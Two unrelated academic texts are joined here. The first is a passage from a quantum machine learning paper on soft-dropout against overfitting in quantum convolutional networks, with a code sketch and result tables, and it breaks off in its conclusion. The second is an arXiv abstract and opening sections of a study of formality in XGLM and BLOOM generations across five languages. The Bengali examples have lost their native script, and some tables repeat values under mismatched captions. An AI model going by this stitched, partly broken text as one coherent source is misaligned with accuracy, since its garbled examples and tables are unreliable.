We find that due to quantum entanglement, the dropout method does not carry over in its simple form to the quantum setting. Rather, we propose a softer version of dropout, as we describe in the next section. We found that the soft-dropout method performs very well in mitigating overfitting in several QCNN numerical experiments. The reason for proposing a post-training method for a QCNN model is as a prevention technique to tackle overfitting even after all previous measures are considered prior to training the model and overfitting is still observed. ## III Methods and techniques Before presenting the results from our numerical experiments, we devote this section to providing an overview of the main tools and techniques we used and developed in this work. ### The QCNN architecture QCNNs are essentially variational quantum algorithms [6; 8]. Similar to their classical counterparts, QCNN is designed and used for solving classification problems (supervised and unsupervised paradigms have been studied in this context) [9]. They were proposed to be well-fitted for NISQ computing due to their intrinsically shallow circuit depth. It was shown that due to unique quantum phenomena, such as superposition and entanglement, QCNN can provide better prediction statistics using less training data than classical ones in certain circumstances [10]. Due to the noise and technical challenges of building quantum hardware, the size of quantum circuits that can be reliably executed on NISQ devices is limited. Thus, the encoding schemes for high dimensional data usually require a number of qubits that are beyond the current capabilities of quantum devices. Therefore, classical dimensionality reduction techniques are particularly useful in the near-term application of QML techniques. In this work, the classical data was pre-processed using two dimensionality reduction techniques, namely Principal Component Analysis (PCA) [11] and Autoencoding (AutoEnc) [12]. Autoencoders are capable of modeling complex non-linear functions, whereas PCA is a simpler linear transformation that helps in cheaper and faster computation. A generic QCNN is composed of a few key components [6; 8], as illustrated in Fig. 1. The first component is data encoding, also known as a quantum feature map. In classical ML, feature maps are used to transform input data into higher-dimensional spaces, where the data can be more easily separated or classified. Similarly, a quantum feature map transforms classical data into a quantum state representation. The main idea is to encode the classical data as an entangled state with the possibility of capturing richer and more complex patterns within the data. The quantum feature map is done in practice by applying a unitary transformation to the initial state (typically the all-zero state). In this work, we implemented two of the main feature encoding schemes, amplitude encoding and qubit encoding [6; 8]. In the former, classical data \((x_{1},\ldots,x_{k})\in\mathrm{R}^{k}\) is represented as, generally, an entangled input quantum state \(\ket{\psi_{\mathrm{in}}}\sim\sum_{i=1}^{k}x_{i}\ket{i}\) (up to normalization), where \(\ket{i}\) is a computational basis ket. Amplitude encoding uses a circuit depth of size \(\mathcal{O}(\log N)\) circuit and \(N\) qubits [13]. To evaluate the robustness of our dropout method with respect to the feature map, we also used qubit encoding. 
In this method the input state is a separable state \(\ket{\psi_{\mathrm{in}}}=\bigotimes_{i=1}^{k}(\cos\frac{x_{i}}{2}|0\rangle+ \sin\frac{x_{i}}{2}|1\rangle)\). As such, it uses a constant-depth circuit given by a product of a single-qubit rotation. The second key component of a QCNN is a parameterized quantum circuit (PQC) [14; 15]. PQCs are composed of quantum gates whose action is determined by the value of a set of parameters. Using a variational algorithm (classical or quantum), the PQC is trained by optimizing the parameters of the gates to yield the highest accuracy in solving the ML task (e.g., classification) on the input data. Typically, in QCNN architectures, the PQC is composed of a repeated sequence of a (parametric) convolution circuit followed by and a (parametric) pooling circuit. The convolution layer is used as the PQC for training a tree tensor network (TTN) [16]. In this work, we used a specific form of the convolution layer, which was proposed and implemented by Hur _et al._[8], and that is constructed out of a concatenation of two-qubit gates (building blocks). In Fig. 2(a)-(b) we sketch two of the building blocks that we used for convolution layer in our architecture. The convolution layer is followed by a pooling layer, which reduces the dimensionality of the input data while preserving important features, i.e., the pooling layer applies parameterized (controlled) quantum gates on the sequence of two qubits. To reduce the dimensionality, the control qubits are traced out (assuming they maintain coherence through the computation) while the target qubits continue to the next convolution layer, see Fig. 1. For the implementation of the pooling layer, we used a parameterized two-qubit circuit that consisting of two controlled rotations \(R_{z}(\theta_{1})\) and \(R_{x}(\theta_{2})\), respectively, each activated when the control qubit is 1 or 0 (filled and open circle in Fig. 2(c)). The PQC is followed by a measurement in the computational basis on the last layer of qubits. Training the QCNN is obtained by successively optimizing the PQC using the input data and their labels by minimizing an appropriate cost function. Here we use the mean squared error (MSE) between predictions and class labels. Given a set of training data \(\{\ket{\psi_{i}},y_{i}\}\) of size \(K\), where \(\ket{\psi_{i}}\) denotes an initial state and \(y_{i}\in\{0,1\}\) denotes their label, the MSE cost function is given by \[C(\mathbf{\theta})=\frac{1}{K}\sum_{i=1}^{K}\Big{(}y_{i}-f_{\mathbf{\theta}}(\ket{\psi _{i}})\Big{)}^{2}. \tag{1}\] Here, \(f_{\mathbf{\theta}}(\ket{\psi_{i}})\) is the output of QCNN (\(f\in\{0,1\}\)) which depends on the set of parameters \(\mathbf{\theta}\) that define the gates of the PQC. ### Dropout Once the models had been trained, we tested two dropout approaches to mitigate overfitting: a straightforward generalization of the classical dropout method and a'softer' approach. In the classical setting, post-training dropout is usually implemented by removing a certain percentage of neurons from the network. In a similar vein, in our first approach, we dropped a certain percentage of single-qubit gates (equivalently, replacing a gate with the identity gate) from the trained network. None of the CNOT gates in the convolution layers or the controlled two-qubit gates in the pooling layers were dropped out. As discussed in length in Sec. IV, we found that this dropout method fails catastrophically. 
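To illustrate this first, naive generalization concretely, the hedged PennyLane sketch below builds a toy QCNN-like circuit with qubit (angle) encoding, evaluates the MSE cost of Eq. (1), and "drops" a single-qubit gate by simply skipping it (i.e., replacing it with the identity). The circuit layout, gate choices, and random data are simplified assumptions for illustration and do not reproduce the exact architecture of [8].

```python
import numpy as np
import pennylane as qml

n_qubits = 4
dev = qml.device("default.qubit", wires=n_qubits)

@qml.qnode(dev)
def qcnn(x, params, keep):
    # Qubit ("angle") encoding of the classical feature vector.
    qml.AngleEmbedding(x, wires=range(n_qubits), rotation="Y")
    # One convolution-like layer: parameterized single-qubit rotations + CNOTs.
    for w in range(n_qubits):
        if keep[w]:                      # hard dropout: skipping the gate = identity
            qml.Rot(*params[w], wires=w)
    for w in range(n_qubits - 1):
        qml.CNOT(wires=[w, w + 1])
    # Crude "pooling": read out a single qubit.
    return qml.expval(qml.PauliZ(n_qubits - 1))

def mse_cost(params, X, y, keep):
    # Eq. (1): mean squared error between predictions in [0, 1] and labels in {0, 1}.
    preds = np.array([(1.0 - qcnn(x, params, keep)) / 2.0 for x in X])
    return float(np.mean((y - preds) ** 2))

rng = np.random.default_rng(0)
X = rng.uniform(0.0, np.pi, size=(8, n_qubits))      # toy stand-in for trained data
y = rng.integers(0, 2, size=8).astype(float)
trained_params = rng.uniform(0.0, 2 * np.pi, size=(n_qubits, 3))

cost_full = mse_cost(trained_params, X, y, keep=[True] * n_qubits)
cost_drop = mse_cost(trained_params, X, y, keep=[False, True, True, True])
print(f"MSE with all gates: {cost_full:.3f}, after dropping one gate: {cost_drop:.3f}")
```

As reported below, even removing a single gate in this way was enough to severely degrade the trained model's predictions.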
Not only did it not help with mitigating overfitting, it substantially reduced the success rates on the _trained_ data. The second method we implemented to mitigate overfitting in QCNNs is termed soft-dropout. Since setting (random, single-qubit) gates to the identity seemed to have a crucial effect on the network's performance, we hypothesized that tinkering with the trained parameters to a certain degree might provide enough flexibility to the model without hampering its accuracy and predictive capability. In the soft-dropout method, rather than dropping out gates completely, some of the trained parameters are slightly modified. The performance of the slightly modified model was then tested using testing and validation data. The process of changing the trained parameters was done manually, in order to study the effect of the soft-dropout method and the threshold at which changing the parameters starts to degrade the model. We envision soft-dropout not as a single technique to deter overfitting but as a collection of techniques that can be utilized individually or in combination. Soft-dropout may consist of techniques such as rounding the trained parameters to a certain number of decimal places, snapping values within a threshold to a common whole number, and setting values that are sufficiently close to zero exactly to zero. For the zeroing technique, every trained parameter whose absolute value fell below a chosen threshold (generally below 0.09) was changed to 0; taking the absolute value of the parameters covers both the positive and the negative part of the spectrum of trained parameters. A similar technique was used for the whole-number conversion, except that values are snapped to a threshold value instead of zero; the threshold was chosen as the point at which overfitting is mitigated without a drop in accuracy, found over several manual iterations as the value that minimizes the testing-validation gap without significantly lowering the testing accuracy itself.

Figure 1: **General QCNN architecture**. The QCNN includes three key components: a feature map, a parametric quantum circuit that includes concatenated convolution and pooling layers, and a measurement followed by an optimization unit. In this work the convolution and the pooling layers are constructed from two-qubit gates (building blocks). Examples of the building blocks we used are given in Fig. 2.

Figure 2: **Two-qubit building blocks of the implemented QCNN.** We used the architecture proposed and implemented in [8]. The building blocks for the convolution layers are given in subfigures (a) and (b), where \(U_{3}(\theta,\varphi,\lambda)=R_{z}(\varphi)R_{x}(-\frac{\pi}{2})R_{z}(\theta)R_{x}(\frac{\pi}{2})R_{z}(\lambda)\), while the building block for the pooling layer is shown in subfigure (c).

For the round-off method, a built-in Python function for rounding values to a certain number of decimal places was used; not all values were rounded, since beyond a certain precision threshold a severe drop in accuracy was observed. The threshold for the round-off method was determined by iterating the method until finding the parameters that yield the highest validation accuracy compared to the unmitigated circuit. Results and observations of the soft-dropout method are discussed for all the datasets in Sec. IV.
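The parameter-tinkering variants described above can be summarized in a short, hedged NumPy sketch. The concrete zeroing threshold of 0.09, the two-decimal rounding, the snapping grid, and the `test_acc_fn`/`val_acc_fn` accuracy callbacks are illustrative assumptions standing in for the manual search described in the text.

```python
import numpy as np

def soft_dropout_candidates(params, zero_thresh=0.09, decimals=2, snap_step=0.5):
    """Yield softly modified copies of the trained QCNN parameters."""
    p = np.asarray(params, dtype=float)
    yield "round", np.round(p, decimals)                  # round to a fixed precision
    zeroed = p.copy()
    zeroed[np.abs(zeroed) < zero_thresh] = 0.0            # zero small-magnitude parameters
    yield "zero", zeroed
    yield "snap", np.round(p / snap_step) * snap_step     # snap to a coarse common grid

def least_overfit(params, test_acc_fn, val_acc_fn, max_test_drop=0.02):
    """Keep the modification with the smallest test-validation gap that does not
    lower the testing accuracy by more than `max_test_drop` (illustrative rule)."""
    base = np.asarray(params, dtype=float)
    base_test = test_acc_fn(base)
    best = ("none", base, base_test - val_acc_fn(base))
    for name, cand in soft_dropout_candidates(params):
        test, val = test_acc_fn(cand), val_acc_fn(cand)
        if test >= base_test - max_test_drop and (test - val) < best[2]:
            best = (name, cand, test - val)
    return best

# Toy usage with stand-in accuracy callbacks (placeholders, not real models).
theta = np.array([0.031, 1.571, -0.004, 2.487, 0.720])
name, theta_soft, gap = least_overfit(theta, lambda p: 0.95, lambda p: 0.90)
```

In practice, the thresholds themselves are tuned by repeating such a loop until the testing-validation gap stops shrinking, as described above.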
## IV Numerical experiments and results ### Datasets Using multiple datasets in ML, including QML, is very useful to increase generalization, robustness, and reliability. It also helps overcome data limitations, introduces variability and heterogeneity, and allows the exploration of different perspectives. In regards to these ideas, we chose to work with three datasets, two of them being image-based medical datasets, Medical MNIST [17] and BraTS [18], while the third was a Stellar dataset [19] consisting of numerical values. Each dataset was split into three parts: one for training, another for testing, and the last portion for validation. The validation set is used to test the performance of the (trained) QCNN on an unseen dataset and provide a proxy for determining if the model exhibits overfitting and how well we mitigate this problem. Many variations of percentage split were implemented to find the best option for creating the overfitting conditions. This operation was performed for all three datasets. Later, after the split, the testing data was added to the training data to develop the overfitting conditions more prominently. Subsequently, the data were processed using PCA for dimensionality reduction and fitting it to the limited number of qubits (we used 8, 12, and 12 qubits). The classically-processed data was then sent for training on a (simulated) QCNN. _Medical MNIST._-- The Medical MNIST dataset consists of 6 classes: Abdominal CT, Breast MRI, Chest CT, Chest X-ray, Hand X-ray, and Head CT. These classes contained around 10000 images, each of size \(64\times 64\) pixels. As we are trying to implement binary classification, all possible permutations of classes were tested, and the similarity between Chest CT and Abdominal CT was considered most of the time. Several QCNNs were created to differentiate between the CT images being a Chest CT image or an Abdominal CT image. These two classes were pretty much alike and, hence, challenging to differentiate and were prone to overfitting, see Fig. 3. _BraTS 2019._-- To validate the uniformity of the proposed dropout approach on different datasets and models, we used another medical dataset for this implementation. The BraTS 2019 dataset was chosen for classification between High-Grade Gliomas (HGG) and Low-Grade Gliomas (LGG) patient MRI images. The BraTS 2019 training dataset has 259 HGG and 76 LGG images. The BraTS multimodal scans are provided in NIfTI file format (.nii.gz) and include the following components: a) native (T1) scans, b) post-contrast T1-weighted (T1Gd) scans, c) T2-weighted (T2) scans, and d) T2 Fluid Attenuated Inversion Recovery (T2-FLAIR) scans. These scans were obtained using diverse clinical protocols and a variety of scanners from a total of 19 different institutions. Due to resource limitations, only one modality, specifically the T2-FLAIR, was considered for the classification of HGG versus LGG. The images were resized to 64 pixels. As depicted in Fig. 4, the resulting images appeared unclear and pixelated, which was expected given the constraints. Figure 4: **Example of BraTS 2019 dataset brain images** The high-resolution brain images at the top row were resized to 64 pixels, bottom row. The resulting images appeared unclear and pixelated which pose a challenge for classification. Figure 3: **Example of Medical MNIST dataset images.** Top row: Abdominal CT, bottom row: Chest CT. 
The similarity between Chest CT and Abdominal CT images implies that they would be hard to classify and, in addition, that the learning model may be prone to overfitting. _Stellar classification dataset (SDSS17)._-- As both of the prior datasets were image-based, we used a dataset in a different format to verify our conclusions and ascertain the claims derived from the results. The stellar classification dataset SDSS17 proved to be a reliable candidate. It consists of 100,000 observations of space taken from the Sloan Digital Sky Survey (SDSS). Every recorded observation was registered in 17 columns defining different values, such as the ultraviolet filter in the photometric system, the green filter in the photometric system, the redshift value based on the increase in wavelength, etc., and one class column identifying the category as a star, quasar, or galaxy. Out of the 17 available columns, only 8 were used for training the model after the initial data pre-processing (columns containing the equipment ID and date parameters were removed in order to generalize the object regardless of its position in the sky and the equipment detecting it). Given the close proximity of the star and quasar data and the difficulty of separating them based on the available features, we chose to classify these two classes using a QCNN. As the data consisted of only 8 columns, PCA did not need to be applied to reduce the dimensionality of the data. Hence, all the experiments conducted for the classification of this dataset were limited to 8 qubits. The same data-splitting process was used as for the previous datasets, with a few exceptions in the train-test-validation split percentages in order to characterize the overfitting scenario.

### Results from numerical experiments

All the experimental data for this manuscript was generated using the PennyLane software (v0.31) and simulated on a local classical device, given the total number of iterations needed to train the QML models and the queuing operations required to complete the process on any of the quantum computers available on the cloud. For optimization purposes, we utilized the PennyLane Nesterov momentum optimizer, considering its merits observed during the initial training of the QML models [20]. The total number of qubits used for this experimentation varied from 8 to 16, depending upon the dataset used and the complexity of the circuit. PCA, as mentioned in Sec. III, was utilized for reducing higher-dimensional data onto the number of qubits defined for the QML model. We verify success in mitigating overfitting in our experiments by two metrics: (1) an increase in validation accuracy and (2) a reduction of the difference between testing and validation accuracy after implementing the dropout method.

#### iv.2.1 Mitigating overfitting using dropout

The first method we implemented to mitigate overfitting in QCNNs is a direct adaptation of (post-training) dropout to the quantum setting, as discussed above. We applied this method to mitigate overfitting when considering the Medical MNIST dataset. We found that this method has devastating effects on the tested QCNNs.
For example, when we implemented this method on an 8-qubit model with a testing accuracy of 95% and validation accuracy of 90%, by dropping out only 5% of the single-qubit gates, the accuracy of the QCNN on the testing data was reduced significantly with 77% accuracy being one of the best-performing models and about 2% being the worst-performing. Not only was this method not able to mitigate overfitting by increasing validation accuracy or reducing the gap between the testing and validation accuracy, but it also resulted in dramatically hampering the performance of the network on the _trained_ data. Similar behavior was observed to be robust with respect to the number of single-qubit gates that were dropped out. Particularly, we tested dropping out 1% to 10% of the single-qubit gates and observed a similar drastic drop in performance accuracy. This was contrary to our naive intuition that a network with many gates, more than the minimum required to accomplish the learning task, should be minimally affected, if at all, by dropping out a few single-qubit gates. To test the effect of the method at its limit, we implemented it by dropping out one (randomly chosen) single-qubit gate out of a model with 78 gates. This experiment resulted in very interesting results. In these cases, the accuracy was plunged to a range of about 46% to 53%, which is almost \(50-50\) chance in the particular model we have tested. This experimentation bore the conclusion that even deleting a single gate from the circuit of a trained QCNN causes a loss of information gained during the training process. We hypothesize that entanglement plays a crucial role in this behavior. In classical CNN, where the dropout method is used very successfully, each neuron holds a few bits of information regarding the data it is trained on, and therefore, losing a small fraction of neurons does not affect the overall performance of the entire network. In stark contrast, QCNN is designed to harness entanglement between qubits in our implementation through the concatenation of single-qubit (parameterized) gates and CNOT gates. This means that the information learned about a certain dataset is stored and distributed in the QCNN in a "non-local" way, loosely speaking. Our experiments show that entanglement can be a double-edged sword in quantum NNs: On one hand, it may promote speedup, e.g., in terms of learning rates, but on the other hand, it can lead to a fragile NN, in the sense that removing even a single gate from a _trained_ network may have devastating consequences with respect to its performance. This experiment, therefore, exposes an intrinsic vulnerability of QML, and QCNNs in particular, in comparison to their classical counterpart. To ascertain the conclusion, we have conducted a set of experiments, schematically shown in Fig. 5. We have constructed a QCNN with 8 qubits and an additional ancillary qubit that does not pass through the feature map but rather is initialized in a computational state (say, \(|0\rangle\)) as a non-featured attestation to the QCNN circuit. Thus, this qubit does not hold any information about the input data. The ancillary qubit is then passed through a parameterized single-qubit gate (our experiments were done with an \(R_{x}\) gate and a \(R_{y}\) gate) whose parameters are consistently updated in every iteration of the training cycle along with the rest of the training parameters in the first convolutional layer. 
The qubit is then entangled with one of the qubits from the circuit with a CNOT gate after the first convolutional layer, and then it is traced out in the following pooling layer. Training this QCNN resulted in 93%-95% testing accuracy (depending on the network building blocks we used). However, by dropping out the parameterized gate of the ancillary qubit, the testing accuracy plunged to order of a few percents. This set of experiments clearly indicates that even though the ancillary qubit was not encoding information about the input data, the mere fact that it is trained and entangled with the rest of the qubits, dropping after training, caused an information loss that resulted in a sharp accuracy drop. These results suggested that while dropping out gates in QCNN may not be a viable method for mitigating overfitting, tinkering with the trained values of the gates parameters may have a more subtle effect and thus can be used for this purpose. #### iv.2.2 Mitigating overfitting using soft-dropout As we discussed above, applying the classically derived method for post-trained dropout resulted in the loss of learned information due dropping of gates. In contrast, encouraging positive results were observed when the soft-dropout method was applied. In these experiments we implemented the method by variations of rounding of the learned parameters and introducing a threshold on the values of the parameters, as prior mentioned in Sec. III. We summarize our results in Tables 1-3, with respect to the datasets they are associated with. The results clearly indicate that when a model suffers from overfitting (as captured by the lower validation accuracy and also an appreciable difference between test accuracy and validation accuracy), the soft-dropout method not only was successful in reducing the gap between testing and validation accuracy in several test cases, but also helped to increase the model validation accuracy across all of our experiments. We attempted to devise a systematic way to determine the threshold for rounding up to a number or an absolute value that could be decided for mitigating overfitting after obtaining the trained parameters. Utilizing this method on several trained and overfitted models, we observed that every model had a different threshold which could only be determined after constant testing to find the best fit for tackling the overfitting issue. In addition, a closer observation revealed that the set of parameters which were used to successfully mitigate overfitting were those which fluctuated around a mean value and did not changed much during training. This observation will be explored in more detail in future work. ## V Conclusion and Outlook In this study we focus on addressing the challenge of overfitting in QML setting, specifically, in QCNNs. Overfitting, a common issue in ML models, poses significant obstacles to the generalization performance of QCNNs. To overcome this challenge, we introduced and explored the potential of soft-dropout and compares it to a straightforward application of the dropout method commonly utilized in classical CNNs. Surprisingly, we found that dropping out even a single parameterized gate from a trained QCNN can results in a dramatic decrease in its performance. This result high Figure 5: **Ancillary qubit dropout experimental setup. The figure depicts the experimental setup used to exemplify the vulnerability of QML models. (a) The QCNN is trained along with an ancillary qubit, which is not part of the feature map. 
The ancilla qubit takes part in the training via a parameterized rotation (\(R_{x}\) or \(R_{y}\)). We found that this setup results in a testing accuracy of about 95%. (b) After training is completed, removing the single-qubit gate from the ancillary qubit, the model experienced a significant loss in prediction accuracy.** lights a vulnerability of QCNNs compared to their classical counterparts. On the other hand the soft-dropout approach resulted in encouraging results. Extensive experimentation is conducted on diverse datasets, including Medical MNIST, BraTS, and Stellar Classification, to evaluate the effectiveness of soft-dropout in mitigating overfitting in QCNNs. Our findings highlight the promising performance of soft-dropout in reducing overfitting and enhancing the generalization capabilities of QCNN models. By fine-tuning the trained parameters through various techniques, notable improvements in accuracy are observed while preserving the integrity of the quantum circuit. Hence, soft-dropout can be considered one of the most viable options to mitigate overfitting in a post-training setting. We close this section with a few directions for future work. The first direction is developing a systematic approach for determining which, and how, parameters should be tinkered to handle overfitting. Following our initial observation, we believe that identifying those parameters that fluctuate around a mean value during training play an important role for mitigating overfitting. Another important direction for future work is to investigate the performance of soft-dropout in the presence of experimental noise. Quantum systems are inherently susceptible to noise, which can impact the reliability and effectiveness of quantum operations. Understanding how soft-dropout performs under noisy conditions will contribute to the development of robust QCNN models that can operate in realistic quantum computing environments. Another aspect that requires further exploration is \begin{table} \begin{tabular}{c c c} \multicolumn{3}{c}{8 qubits} \\ \hline **Test Acc. Validation Acc.** & **Gap** \\ \hline 0.8728 & 0.8548 & 0.018 \\ 0.8765 & 0.8829 & -0.0064 \\ 0.8543 & 0.8499 & 0.0044 \\ 0.8655 & 0.8757 & 0.0102 \\ \hline \end{tabular} \begin{tabular}{c c c} \multicolumn{3}{c}{12 qubits} \\ \hline **Test Acc. Validation Acc.** & **Gap** \\ \hline 0.8958 & 0.8859 & 0.01 \\ 0.8996 & 0.9082 & -0.0086 \\ 0.8666 & 0.8645 & 0.0021 \\ 0.8731 & 0.8793 & 0.0062 \\ \hline \end{tabular} \begin{tabular}{c c c} \multicolumn{3}{c}{16 qubits} \\ \hline **Test Acc. Validation Acc.** & **Gap** \\ \hline 0.9422 & 0.9257 & 0.0165 \\ 0.9518 & 0.9586 & -0.0068 \\ 0.8972 & 0.8895 & 0.0077 \\ 0.9127 & 0.9233 & 0.0106 \\ \hline \end{tabular} \end{table} Table 2: **Results based on BraTS dataset.** The format of results is similar to Table 1. for different models that were trained with qubits 8, 12 and 16. For all three numbers of qubits (8, 12, and 16), the validation accuracy after soft-dropout was implemented is higher than without dropout. This suggests that soft-dropout regularization technique helps improve the model’s generalization performance and reduces overfitting. \begin{table} \begin{tabular}{c c c} \multicolumn{3}{c}{8 qubits} \\ \hline **Test Acc. 
Validation Acc.** & **Gap** \\ \hline 0.9154 & 0.7175 & 0.1979 \\ 0.9229 & 0.8629 & 0.06 \\ \hline 0.9721 & 0.9136 & 0.0585 \\ 0.9794 & 0.9447 & 0.0347 \\ \hline 0.9225 & 0.8770 & 0.0455 \\ 0.9339 & 0.9039 & 0.03 \\ \hline 0.9675 & 0.9298 & 0.0377 \\ 0.9464 & 0.9374 & 0.009 \\ \hline \end{tabular} \begin{tabular}{c c c} \multicolumn{3}{c}{12 qubits} \\ \hline **Test Acc. Validation Acc.** & **Gap** \\ \hline 0.8958 & 0.8859 & 0.01 \\ 0.8996 & 0.9082 & -0.0086 \\ \hline 0.8666 & 0.8645 & 0.0021 \\ 0.8731 & 0.8793 & 0.0062 \\ \hline \end{tabular} \begin{tabular}{c c c} \multicolumn{3}{c}{16 qubits} \\ \hline **Test Acc. Validation Acc.** & **Gap** \\ \hline 0.9422 & 0.9257 & 0.0165 \\ 0.9518 & 0.9586 & -0.0068 \\ \hline 0.8972 & 0.8895 & 0.0077 \\ 0.9127 & 0.9233 & 0.0106 \\ \hline \end{tabular} \end{table} Table 3: **Results based on Stellar dataset.** Results have the same format as in Table 1. The results clearly indicate that soft-dropout was successful in mitigating overfitting, as indicated by higher validation accuracy and smaller gap, as compared to the results with no dropout, across all tested models. the scalability and performance of soft-dropout in larger QCNN models. As quantum hardware continues to advance, larger and more complex QCNN architectures become feasible. Evaluating the behavior and effectiveness of soft-dropout in handling larger quantum circuits will provide insights into its scalability and potential challenges in maintaining regularization benefits. By pursuing these research directions, we can advance the field of QML and enhance the practical deployment of QCNN models. Overcoming overfitting challenges is crucial for ensuring the reliability and effectiveness of QCNNs in real-world applications, unlocking their potential to make significant contributions in various domains. ###### Acknowledgements. This project was supported in part by NSF award #2210374.
2302.12299
In What Languages are Generative Language Models the Most Formal? Analyzing Formality Distribution across Languages
Multilingual generative language models (LMs) are increasingly fluent in a large variety of languages. Trained on the concatenation of corpora in multiple languages, they enable powerful transfer from high-resource languages to low-resource ones. However, it is still unknown what cultural biases are induced in the predictions of these models. In this work, we focus on one language property highly influenced by culture: formality. We analyze the formality distributions of XGLM and BLOOM's predictions, two popular generative multilingual language models, in 5 languages. We classify 1,200 generations per language as formal, informal, or incohesive and measure the impact of the prompt formality on the predictions. Overall, we observe a diversity of behaviors across the models and languages. For instance, XGLM generates informal text in Arabic and Bengali when conditioned with informal prompts, much more than BLOOM. In addition, even though both models are highly biased toward the formal style when prompted neutrally, we find that the models generate a significant amount of informal predictions even when prompted with formal text. We release with this work 6,000 annotated samples, paving the way for future work on the formality of generative multilingual LMs.
Asım Ersoy, Gerson Vizcarra, Tasmiah Tahsin Mayeesha, Benjamin Muller
2023-02-23T19:39:52Z
http://arxiv.org/abs/2302.12299v1
In What Languages are Generative Language Models the Most Formal? Analyzing Formality Distribution across Languages ###### Abstract Multilingual generative language models (LMs) are increasingly fluent in a large variety of languages. Trained on the concatenation of corpora in multiple languages, they enable powerful transfer from high-resource languages to low-resource ones. However, it is still unknown what cultural biases are induced in the predictions of these models. In this work, we focus on one language property highly influenced by culture: formality. We analyze the formality distributions of XGLM and BLOOM's predictions, two popular generative multilingual language models, in 5 languages. We classify 1,200 generations per language as formal, informal, or incohesive and measure the impact of the prompt formality on the predictions. Overall, we observe a diversity of behaviors across the models and languages. For instance, XGLM generates informal text in Arabic and Bengali when conditioned with informal prompts, much more than BLOOM. In addition, even though both models are highly biased toward the formal style when prompted neutrally, we find that the models generate a significant amount of informal predictions even when prompted with formal text. We release with this work 6,000 annotated samples, paving the way for future work on the formality of generative multilingual LMs. ## 1 Introduction Natural Language Processing (NLP) systems are used worldwide across multiple cultures, audiences, contexts, communication goals, demographics, and languages. Thus it is essential that these models be able to adapt to the sociocultural context of its users. As described by Hershcovich et al. (2022), linguistic style is one of the major dimensions by which cultures vary in NLP technologies. In this work, we focus on formality. Formality is a stylistic property of language that can impact how we perceive a text. It typically carries information about the culture of the speaker (or writer), is constrained by the context of the message, and can impact the communicative goal of a text (Heylighen and Dewaele, 1999). Generating text with a desired level of formality can be useful for different NLP applications (Hovy and Yang, 2021). For example, controlling the tone of machine translation models (Sennrich et al., 2016; Niu et al., 2017; Feely et al., 2019), designing chatbots with formality awareness to respond to user-preferred conversational style (Cox and Ooi, 2022), or assisting users to change the formality level of their writings (Rao and Tetreault, 2018; Wang et al., 2019, 2020). Generative language models have demonstrated capabilities in producing cohesive texts and solving NLP tasks with zero/few-shot learning (Radford et al., 2019; Brown et al., 2020; Chowdhery et al., 2022; Zhang et al., 2022), even in multilingual scenarios (Lin et al., 2021; Scao et al., 2022; Barbieri et al., 2022; Jiang et al., 2022). Multilingual language models are trained with large amounts of text from different sources. That training process could make the model biased towards a certain level of formality because of the data of each language as well as cross-lingual transfer (Pires et al., 2019; Libovicky et al., 2020; Muller et al., 2021), limiting the capabilities of the model to adapt to different cultures of an NLP application. 
This work analyzes the formality level of two multilingual language models: XGLM (Lin et al., 2021) and BLOOM (Scao et al., 2022), across five languages, namely Arabic, Bengali, English, French, and Spanish. To do so, a native/proficient speaker of each language evaluates the generation outputs of each model into three categories: formal, informal, and incohesive. This evaluation allows us to analyze the generations across three different dimensions: the cohesiveness of the generations,1 the formality bias given neutral prompts, and the formality preservation given formal/informal prompts. As an example, we show in Table 1 the predictions of BLOOM and XGLM conditioned on the same prompt in Bengali but generating text of different formality level. Overall, our contributions are the following: * To the best of our knowledge, this is the first work to analyze the formality of generative multilingual language models across multiple languages. While we have focused on specific models and languages in this work, the procedures followed to define formality, prompt sourcing, language generation, and measurement of how formality is preserved from prompts are generalizable to any generative system and language. We open-source 1,200 generations, per language, manually annotated as formal, informal, or incohesive 2. Footnote 2: [https://github.com/asimokby/formality-bias-analysis](https://github.com/asimokby/formality-bias-analysis) * We find that BLOOM generates about twice longer texts as XGLM. Besides, almost all the generated formal sentences are longer than the informal ones. Also, informal generations in English, French, and Spanish are characterized by being more conversational, and in Bengali, by having more punctuation marks. * We find that BLOOM is significantly more cohesive than XGLM in English, French, and Spanish and performs similarly in other languages. * Both XGLM and BLOOM are generally biased toward formal text when prompted in a neutral way. However, both models are very sensitive to the formality of the prompt and will generate informal text if conditioned with informal prompt. This is particularly striking for Arabic: BLOOM generates dialectal Arabic (considered informal) when prompted with informal text while being extremely biased toward Modern-Standard Arabic (considered formal). ## 2 Formality Across Different Languages We start by defining formality in the five languages in our study. ArabicThe Arabic language is spoken in many dialects Watson (2011). These dialects are variants of classical or standard Arabic, which has a modernized version of it called Modern Standard Arabic (MSA). Badawi (1973), in his famous book _Mustawayat Al-arabiyya Al-muasira Fi Misr_ (_The levels of contemporary Arabic in Egypt_), presents a theory on the relationship between standard Arabic (_Fusha_) and vernacular Arabic (_Anmiya_) in Egypt. His theory describes the situation as a continuum with 5 major divisions: illiterate colloquial Arabic, educated colloquial Arabic, elevated colloquial Arabic, modern standard Arabic, and classical Arabic. The first three divisions are _Anmiya_, which is considered informal and not necessarily grammatically correct. The last two divisions are _Fusha_, which is considered formal. However, the definition of what is formal and what is informal could depend on the problem at hand, for example, in one case, elevated colloquial Arabic could be considered formal while illiterate colloquial Arabic as informal. 
In our work, we define formality for Arabic as follows: a piece of text is formal if it contains no words coming from any Arabic dialect which is not considered as _Fusha_, following (Badawi, 1973)'s definition of _Fusha_. For example, the following sentence: younger, children or very close friends. The third person _he / she_ can be translated to /Tini (formal) vs /Se (informal) which encodes two levels of formality- honorific and non-honorific. Bengali Pronouns can encode numbers such as singular/plural, but the notion of formality is not changed by gender or numerical properties (David, 2015). The following are other considerations of formality in Bengali : * Texts containing a high frequency of Sanskrit-originated words can be considered formal. Agglutination/Compound words can be considered more formal compared to their analytical or elaborated forms. (formal) /Tini (informal) -- _death_ has same meaning, but a different formality (Panda, 1992; Nagarajan, 2014; Ghosh et al., 2022). * Bengali pronouns agree with the verb in levels of formality and there are formal and informal variations of the same verb. (David, 2015; Sultana, 2016) For instance, verbs like _Give_, _Eat_, _Go_ can be written as (formal) or (formal) depending on the context. * Bengali does not contain any negative pronoun or adverb and sentences can be modified to be negative at a syntactic level by adding or other modifiers. These negation modifiers like _na/nei/nai/Ni_ can indicate variations in formality (Thompson, 2006). * Among Bengali speakers in Bangladesh, regional dialects like Sylheti, Chakma, and Chittagonian are generally considered deviant or informal while classical Bengali dialect (Sadhubhasa) or standardized Bengali dialect (Cholito vasha) is considered formal (Ray et al., 1966). EnglishFormality in English is commonly defined as the style of language used in a given situation. A formal speech, for instance, has a very careful selection of pronunciation, words, and structure (Richards and Schmidt, 2013). Heylighen and Dewaele (1999) divide English formality into two dimensions: a _deep 